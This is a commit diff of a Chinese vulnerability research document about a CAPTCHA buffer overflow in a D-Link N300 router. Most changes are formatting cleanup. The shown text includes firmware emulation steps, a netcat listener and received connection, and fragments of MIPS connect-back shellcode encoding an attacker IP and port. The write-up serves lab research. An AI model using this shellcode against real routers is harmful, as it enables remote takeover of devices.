<commit_message>
update for dlink vulnerability research
</commit_message>
<xml_diff>
--- a/D-Link Wireless N300云路由器CAPTCHA处理缓冲区溢出漏洞/DLink-Wireless-N300-Cloud-Router-CAPTCHA-Processing-Buffer-Overflow-Vulnerability.docx
+++ b/D-Link Wireless N300云路由器CAPTCHA处理缓冲区溢出漏洞/DLink-Wireless-N300-Cloud-Router-CAPTCHA-Processing-Buffer-Overflow-Vulnerability.docx
@@ -196,13 +196,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>svn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> checkout http://firmware-mod-kit.googlecode.com/svn/ firmware-mod-kit-read-only</w:t>
+      <w:r>
+        <w:t>svn checkout http://firmware-mod-kit.googlecode.com/svn/ firmware-mod-kit-read-only</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -257,14 +252,12 @@
         </w:rPr>
         <w:t>编译</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>qemu</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -303,14 +296,12 @@
         </w:rPr>
         <w:t>的</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>qemu</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -364,14 +355,12 @@
         </w:rPr>
         <w:t>注意</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>mips</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -379,47 +368,7 @@
         <w:t>平台，所以要注释掉</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">&amp;&amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ehdr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>e_shentsize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> == </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sizeof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>elf_shdr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>&amp;&amp; ehdr-&gt;e_shentsize == sizeof(struct elf_shdr)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -441,15 +390,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">./configure --static &amp;&amp; make &amp;&amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> make install</w:t>
+        <w:t>./configure --static &amp;&amp; make &amp;&amp; sudo make install</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -459,24 +400,14 @@
         </w:rPr>
         <w:t>参考</w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText>HYPERLINK "http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-        </w:rPr>
-        <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p/>
     <w:p>
@@ -512,7 +443,7 @@
         </w:rPr>
         <w:t>参考</w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -567,14 +498,12 @@
         </w:rPr>
         <w:t>下载</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>mips</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -583,7 +512,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId9" w:history="1">
+      <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -604,11 +533,9 @@
         </w:rPr>
         <w:t>编译</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>apmib.c</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -626,7 +553,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -642,15 +569,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> * LD_PRELOAD lib for faking calls to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apmib</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> library.</w:t>
+        <w:t xml:space="preserve"> * LD_PRELOAD lib for faking calls to the apmib library.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -660,31 +579,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> * $ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mips-linux-gcc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -Wall -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fPIC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -shared </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apmib.c</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -o apmib-ld.so</w:t>
+        <w:t xml:space="preserve"> * $ mips-linux-gcc -Wall -fPIC -shared apmib.c -o apmib-ld.so</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -695,28 +590,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>#include &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stdio.h</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>#include &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stdlib.h</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
+        <w:t>#include &lt;stdio.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#include &lt;stdlib.h&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -755,21 +634,8 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apmib_init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(void)</w:t>
+      <w:r>
+        <w:t>int apmib_init(void)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -797,31 +663,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">void </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apmib_get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> code, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> *value)</w:t>
+        <w:t>void apmib_get(int code, int *value)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -949,39 +791,19 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>#</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ifdef</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> DEBUG</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">("Code: 0x%X (%d)   Value: 0x%X (%d)\n", code, code, *value, *value); </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>#</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endif</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>#ifdef DEBUG</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">printf("Code: 0x%X (%d)   Value: 0x%X (%d)\n", code, code, *value, *value); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#endif</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -1023,7 +845,6 @@
         </w:rPr>
         <w:t>用</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1036,7 +857,6 @@
         </w:rPr>
         <w:t>emu</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1049,14 +869,12 @@
         </w:rPr>
         <w:t>，切换目录至文件系统的</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>rootfs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1093,33 +911,11 @@
         </w:rPr>
         <w:t>运行</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>chroot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> . ./</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>qemu-mips</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -E LD_PRELOAD =lib/apmib-ld.so -g 1234 bin/boa </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">chroot . ./qemu-mips -E LD_PRELOAD =lib/apmib-ld.so -g 1234 bin/boa </w:t>
       </w:r>
       <w:r>
         <w:t>–</w:t>
@@ -1138,24 +934,14 @@
         </w:rPr>
         <w:t>或者用</w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText>HYPERLINK "http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-        </w:rPr>
-        <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
+        </w:r>
+      </w:hyperlink>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1199,7 +985,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11" cstate="print"/>
+                    <a:blip r:embed="rId13" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1245,15 +1031,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>D:\&gt;nc -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vlp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 31337</w:t>
+        <w:t>D:\&gt;nc -vlp 31337</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1317,21 +1095,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>localhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [10.8.146.92] 42542</w:t>
+        <w:t xml:space="preserve"> localhost [10.8.146.92] 42542</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1348,14 +1112,12 @@
         </w:rPr>
         <w:t>运行</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>poc</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1378,7 +1140,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -1450,30 +1212,17 @@
         <w:ind w:firstLineChars="400" w:firstLine="840"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"># Big </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endian</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> IP address 192.168.1.100</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">"\x3c\x0e\xc0\xA8", # </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t># Big endian IP address 192.168.1.100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x3c\x0e\xc0\xA8", # lui</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
         <w:t>t6,0x7f01</w:t>
@@ -1485,21 +1234,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>"\x35\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">\x07\x16", # </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ori</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"\x35\xce\x07\x16", # ori</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
         <w:t>t6,t6,0x101</w:t>
@@ -1569,13 +1305,8 @@
         <w:ind w:firstLineChars="400" w:firstLine="840"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">"\x3c\x0e\x1f\x90", # </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"\x3c\x0e\x1f\x90", # lui</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
         <w:t>t6,0x1f90</w:t>
@@ -1587,21 +1318,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>"\x35\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">\x1f\x90", # </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ori</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"\x35\xce\x1f\x90", # ori</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
         <w:t>t6,t6,0x1f90</w:t>
@@ -1714,7 +1432,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print"/>
+                    <a:blip r:embed="rId15" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1769,7 +1487,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:blip r:embed="rId16" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1827,38 +1545,17 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MEMORY:408FCB7C </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>addiu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">   $sp, 0x20</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">MEMORY:408FCB80 la      $t9, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>range_pool_pop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">MEMORY:408FCB84 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>beqz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">    $a3, loc_408FCBA0</w:t>
+        <w:t>MEMORY:408FCB7C addiu   $sp, 0x20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MEMORY:408FCB80 la      $t9, range_pool_pop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MEMORY:408FCB84 beqz    $a3, loc_408FCBA0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1868,21 +1565,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MEMORY:408FCB8C </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jalr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">    $t9 ; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>range_pool_pop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>MEMORY:408FCB8C jalr    $t9 ; range_pool_pop</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1893,13 +1577,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>qemu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: uncaught target signal 11 (Segmentation fault) - core dumped</w:t>
+      <w:r>
+        <w:t>qemu: uncaught target signal 11 (Segmentation fault) - core dumped</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1925,7 +1604,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:blip r:embed="rId17" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2002,16 +1681,8 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>docx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>.docx</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2020,24 +1691,14 @@
         </w:rPr>
         <w:t>可以参考</w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText>HYPERLINK "http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-        </w:rPr>
-        <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p/>
     <w:p>
@@ -2047,24 +1708,14 @@
         </w:rPr>
         <w:t>参考</w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText>HYPERLINK "http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-        </w:rPr>
-        <w:t>http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/</w:t>
+        </w:r>
+      </w:hyperlink>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2085,14 +1736,12 @@
         </w:rPr>
         <w:t>在</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>getAuthCode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2142,7 +1791,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16" cstate="print"/>
+                    <a:blip r:embed="rId20" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2171,12 +1820,30 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体可参考</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>http://www.devttys0.com/2011/11/exploiting-embedded-systems-part-4/</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2191,12 +1858,55 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>http://www.devttys0.com/2011/11/exploiting-embedded-systems-part-4/</w:t>
-      </w:r>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>六、漏洞利用</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>暂无</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>七、总结</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>嵌入式平台的漏洞调试需要进一步的学习</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>

</xml_diff>